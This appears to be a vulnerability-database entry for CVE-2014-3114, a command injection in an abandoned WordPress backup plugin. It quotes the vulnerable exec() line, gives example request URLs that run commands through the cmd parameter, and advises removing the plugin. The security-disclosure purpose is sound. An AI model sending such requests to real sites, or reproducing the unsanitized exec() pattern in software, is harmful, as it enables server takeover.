CVE-2014-3114
Description
The EZPZ One Click Backup plugin for WordPress <=12.03.10 allows unauthenticated remote attackers to execute arbitrary OS commands via the cmd parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
The EZPZ One Click Backup plugin for WordPress <=12.03.10 allows unauthenticated remote attackers to execute arbitrary OS commands via the cmd parameter.
Vulnerability
The EZPZ One Click Backup plugin for WordPress, version 12.03.10 and earlier, contains an OS command injection vulnerability in the file functions/ezpz-archive-cmd.php. The plugin directly passes the user-supplied cmd GET parameter to the PHP exec() function without any sanitization or validation, as shown in the source code: exec(urldecode($_GET['cmd']));. This allows an unauthenticated remote attacker to inject arbitrary operating system commands. [1]
Exploitation
An attacker can exploit this vulnerability by sending a crafted HTTP GET request to the vulnerable plugin file with a malicious cmd parameter. No authentication or prior access is required. For example, a request to http://target/wp-content/plugins/ezpz-one-click-backup/functions/ezpz-archive-cmd.php?cmd=id would execute the id command on the server. The attacker can chain multiple commands using shell metacharacters. [1]
Impact
Successful exploitation allows an unauthenticated remote attacker to execute arbitrary commands on the underlying operating system with the privileges of the web server user. This can lead to full compromise of the WordPress site, including data exfiltration, file modification, installation of backdoors, and potential lateral movement within the hosting environment. [1]
Mitigation
No patched version of the plugin has been released. The vendor was unresponsive, and the WordPress plugins team was notified on 2014-04-30. The only effective mitigation is to immediately remove (uninstall) the EZPZ One Click Backup plugin from any affected WordPress installation. The plugin is considered abandoned and should not be used. [1]
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2<= 12.03.10+ 1 more
- (no CPE)range: <= 12.03.10
- (no CPE)range: <=12.03.10
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The plugin passes the unsanitized `cmd` GET parameter directly to PHP's `exec()` function, enabling arbitrary OS command execution."
Attack vector
An unauthenticated remote attacker sends an HTTP GET request to `functions/ezpz-archive-cmd.php` with a `cmd` parameter containing arbitrary operating system commands [ref_id=1]. The plugin passes the unsanitized `cmd` value directly to PHP's `exec()` function, which executes the command on the server [ref_id=1]. No authentication or special privileges are required, making this trivially exploitable by anyone who can reach the WordPress installation [ref_id=1].
Affected code
The vulnerable file is `functions/ezpz-archive-cmd.php` in the EZPZ One Click Backup plugin version 12.03.10 and earlier [ref_id=1]. The file contains a single code block that directly passes user-supplied input to `exec()` without any sanitization [ref_id=1].
What the fix does
No patch was ever released for this vulnerability; the plugin developer abandoned the project in 2012 and the advisory explicitly states "Fixed version: N/A" and "Solution: Remove plugin" [ref_id=1]. The only remediation is to completely remove the plugin from any affected WordPress installation [ref_id=1].
Preconditions
- configThe vulnerable plugin must be installed and accessible at the expected path under wp-content/plugins/
- authNo authentication required; the attacker only needs network access to the WordPress site
- networkAttacker must be able to send HTTP GET requests to the WordPress server
- inputAttacker supplies arbitrary OS commands via the cmd GET parameter
Reproduction
Send a GET request to the vulnerable endpoint with a command in the `cmd` parameter. For example: `http://example.com/wp-content/plugins/ezpz-one-click-backup/functions/ezpz-archive-cmd.php?cmd=uptime` [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.openwall.com/lists/oss-security/2014/05/01/11mitremailing-listx_refsource_MLIST
News mentions
0No linked articles in our index yet.